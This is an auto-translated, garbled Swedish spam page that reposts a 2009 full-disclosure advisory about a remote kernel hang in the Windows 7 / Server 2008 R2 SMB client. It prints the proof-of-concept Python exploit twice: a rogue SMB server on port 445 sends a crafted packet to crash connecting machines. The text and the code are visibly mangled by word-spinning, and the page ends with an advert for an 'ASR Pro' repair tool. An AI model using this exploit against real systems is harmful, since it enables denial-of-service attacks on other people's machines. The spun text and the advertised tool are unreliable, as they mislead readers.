Godkänd

Om Windows 7th / Server 2008r2 Remote Kernel utan tvekan kraschar på din dator, tror vi att den här användarhandboken kan hjälpa dig att lösa problemet. g.Microsoft Windows kraftfull / Server 2008 R2 SMB Client Infinite Loop: Den utnyttjar ett enormt misslyckande att utföra operationer i deras Microsoft Windows SMB-klient för Windows 7 plus Windows Server 2008 R2. Det misslyckas oftast med den bortre kärnan. Metasploit Framework innehåller ett element för att utnyttja min sårbarhet.

g.

  #! / usr / kompostbehållare / python# win7-crash.Trigger py:# fjärrskrivbordshjälp kärnkrasch på värdserver Win7 förutom 2008R2 (oändlig loop)# KeAccumulateTicks () missöden på grund av NT_ASSERT () / DbgRaiseAssertionFailure () orsakade av kraftfulla# Ändlös cykel.# INGEN BSOD, DU MÅSTE KOPPLA UR KONTAKTEN.# Att kalla det snabbt; använder order:  this_script_ip_addr  BLAH, fordonsolycka utan ansträngning# Författare: Laurent Gaffi¯ ¿ ½Importera Socket ServerPaket = (" x00  x00  x00  x9a" nummer tidsspann ---> måste vara 9:e, inte 9a .." xfe  x53  x4d  x42  x40  x00  x00  x00  x00  x00  x00  x00  x00  x00  x01  x00"" x01  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00"" x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00"" x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00"" x41  x00  x01  x00  x02  x02  x00  x00  x30  x82  xa4  x11  xe3  x12  x23  x41"" xaa  x4b  xad  x99  xfd  x52  x31  x8d  x01  x00  x00  x00  x00  x00  x01  x00"" x00  x00  x01  x00  x00  x00  x01  x00  xcf  x73  x67  x74  x62 x60  xca  x01 "" xcb  x51  xe0  x19  x62  x60  xca  x01  x80  x00  x1e  x00  x20  x4c  x4d  x20"" x60  x1c  x06  x06  x2b  x06  x01  x05  x05  x02  xa0  x12  x30  x 10  xa0  x0e"" x30  x0c  x06  x0a  x2b  x06  x01  x04  x01  x82  x37  x02  x02  x0a")SMB2 klassrum (SocketServer.BaseRequestHandler):  Def-Handle (själv):        få "Vem:", self.client_address        Använd "TACK SDL"       Posten innebär self.request.recv (1024)        self.request.send (paket)        self.request.close ()lansering är lika med SocketServer.TCPServer (('', 445), SMB2) nummer lyssna på alla gränssnitt stad och län 445launch.serve_forever ()             

Det här felet är ett viktigt bevis på att SDL FAIL
Målet för felet är egentligen en oändlig loop på smb1,2, förautentisering, utan tvekan krävs inga inloggningsuppgifter …
Can lanseras på det lokala nätverket på grund av (IE *)
Felet är med all sannolikhet så enkelt att det här verktyget borde ha upptäckts för två säsonger sedan av en specifik SDL som om SDL redan fanns:

netbios_header betyder struct.pack (“> i”, len (”. vara en del av (SMB_packet)) + SMB_packet
(Netbios h2-biljetterna anger längden på ett nytt nytt smb1,2-paket.)

Om netbios_header-nummer är 4 byte mindre eller kanske mer än SMB_packet, kommer situationen förmodligen helt enkelt att brytas!
VILKEN SORT ?? Skämtar du med mig var är denna SDL?!?

“Det säkraste utförande systemet på ljuset. е “;
Att din korrekta brandvägg är utarbetad bör tas bort via IE, huvudsakligen med nbns broadcast-metod (ingen kontointeraktion)

=================================================
– Släpp den stora dagen: 11 november 2009
– Upptäckt precis av: Laurent Gaffier
– Allvarlighet: medel – hög
===============================================

NS. BEKRÄFTELSE AV KONCEPTET
————————–
# win7-crash.py:
# Kör en levande fjärrkärnakrasch under Win7 och dessutom Server 2008R2 (oändlig loop)
# KeAccumulateTicks () kraschade på grund av NT_ASSERT () / DbgRaiseAssertionFailure () orsakat av- # stark oändlig loop.
# INGEN BSOD, DU HAR EN KORK.
# Att kalla det snabbt; i har: this_script_ip_addr BLAH, minska så snart som möjligt
# Upplagt av Laurent Gaffier
#

Package = (nummer ” x00 x00 x00 x9a” —> 7:e längden borde egentligen vara särskilt 9a ..
” xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00″
” x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x41 x00 x01 x00 x02 x02 x00 x00 x30 x82 xa4 x11 xe3 x12 x23 x41″
” xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00 “
” x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01″
” xcb x51 xe0 x19 x62 x60 xca x01 x80 x00 x1e x00 x20 x4c x4d x20″
” x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 x10 xa0 x0e”
” x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a”)

V. KOMMERSIELL PÅVERKAN
————————–
En angripare kan lite inaktivera vilken Windows 2008R2-server som helst många /
på det lokala nätverket kanske via IE

Vii. Patch-alternativ
————————–
är inte tillgänglig för den här platsen, din internetleverantör bryr sig inte.
Stäng SMB-funktion och portar tills giltig irs-revision tillhandahålls.

X. FÖRÄNDRINGARS HISTORIA
————————–
8 november 2009: MSRC ringde till
8 november 2009: MSRC upptäckt sårbarhet
11 nov 2009: MRSC är detta för att övertyga mig eftersom det vanligtvis finns en IPv6-bugg från olika återförsäljare som inte ska visas i säkerhetsbulletiner på flygplatser.
11 november 2009: Denna kvalitetsbugg har släppts.

XI. ANMÄRKNINGAR
————————–
Den juridiska informationen kring detta meddelande tillhandahålls “i befintligt skick”
utan utfästelser eller garantier som vanligtvis förknippas med ändamålsenlighet eller annat.
Jag accepterar inte några skador som orsakats av operatören möjligen
Missbruk av denna information.

Fullständig upplysningMailing List Arkiv

Fjärrkärna ett fordon Windows 7 Server 2008R2Från: laurent gaffie
Datum: gmail onsdag 16 november 2009 05:58:44 – 05:00
=============================================- Utgivningsdatum: tio november 2009- Nyss upptäckt: Laurent Gaffier- Allvarlighet: Medium / Hög.=================================================I. SÅRBARHET————————–Fjärrkärnlås Windows 1, * Server 2008R2II. SAMMANHANG————————–# FAIL, # FAIL, # FAILSDL FAIL, “Det säkraste operativsystemet någonsin” -> Fjärrkärna på några minuter.# FAIL, # FAIL, # FAILIII. BESKRIVNING————————–Se: http://g-laurent.blogspot.com/ för mer information och några detaljer.# Kommentar: Denna bugg är känd för Windows 7 / 2008R2.NS. KONCEPTuella bevis————————–# win7-crash.py:# Kör en annan fjärrkärna abend under Win7 förutom webbserver 2008R2 (oändlig loop)# KeAccumulateTicks () incidenter på grund av NT_ASSERT () / DbgRaiseAssertionFailure ()summoningano ändlös loop.# INGEN BSOD, DU KOPPLAR UR KONTAKTEN.# För snabbstart från målet: this_script_ip_addr BLAH, omedelbartkrascha#Författare: Laurent Gaffier#Importera Socket ServerPaketet motsvarar ” x00 x00 x00 x9a” # —> förmodligen sjunde, inte 9a.” xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00″” x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″” x41 x00 x01 x00 x02 x02 x00 x00 x30 x82 xa4 x11 xe3 x12 x23 x41″” xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00″” x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01″” xcb x51 xe0 x19 x62 x60 xca x01 x80 x00 x1e x00 x20 x4c x4d x20″” x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 sony ericsson xperia x10 xa0 x0e”” x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a”SMB2-klass (SocketServer.BaseRequestHandler): def hantera (auto): “Vem:” Bild, self.client_address Posten skulle betyda self.request.recv (1024) self.request.send (paket) self.request.close ()Start betyder SocketServer.TCPServer ((”, 445), SMB2) # lyssnar på flera portar445kör interface.serve_forever ()#SDL FAILV. BUSINESS Attack mot angriparen————————–och kan fjärrkrascha en Windows 7 / Server 2008R2.VI… BOKADE SYSTEM————————–Windows 7, Windows 2008R2VII-server. LÖSNING————————–Det finns ingen patch vid det ögonblickliga, leverantören bryr sig inte om det.Stäng SMB-objektet såväl som portar tills en verklig revision verkligen utförs.VIII. REFERENSER————————–http://blogs.msdn.com/sdl/http://g-laurent.blogspot.com/http://twitter.com/g_laurentIX. Lån————————–Denna sårbarhet infördes av Laurent Gaffier. upptäcktLaurent.gaffieremove-this (på) gmail.comX. HISTORIA ÖVER REVISIONER————————–8 november 2009: kontaktade MSRC.9 november 2009: MSRC har karakteriserat en sårbarhet.11 november 2009: MRSC har börjat försöka övertyga sig själv om att IPv6 från olika leverantörer är en viktig bugg.ska inte visas i säkerhetsbulletiner.15 november 2009: Win Remote 7 Kernel Smash släpptesXI. RÄTTSLIGT MEDDELANDE————————–Informationen i detta meddelande tillhandahålls “i befintligt skick”.utan garantiinformation eller erbjudanden om användning, eller då och då annars.Jag ansvarar inte för skador orsakade av användning av att arbeta med ellermissbruka denna information.XII Personliga anteckningar————————–Mer avlägsna FD @MS-kärnor kommer ett senare datum.

 ________________________________________________Kön Mitt avslöjande relaterat till information - lita fantastiskt nu.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlNyss postat och sponsrat av Secunia Http: // secunia-.com/ 

Efter datum Av Tråd

Aktuell ström:

• Windows Server 2008R2 Kraftfull fjärrkärnkrasch i grunden Laurent Gaffy (11 nov)

Godkänd

ASR Pro-reparationsverktyget är lösningen för en Windows-dator som kör långsamt, har registerproblem eller är infekterad med skadlig programvara. Detta kraftfulla och lättanvända verktyg kan snabbt diagnostisera och fixa din dator, öka prestandan, optimera minnet och förbättra säkerheten i processen. Lider inte av en trög dator längre - prova ASR Pro idag!

Charles Pye

Related posts:

Löst: Förslag För Att Verkligen Fixa Fsbuild Pmdg-fel Löst: Förslag På Gratis Reparation Av Bootsektorn Förslag För Att åtgärda Dreamweaver FTP-åtkomst Nekad-felet Vad är Vanligtvis Como Atualizar Bios Nrrr Placa Mae Asus P5kpl-am Se Och Exakt För Att Fixa Det?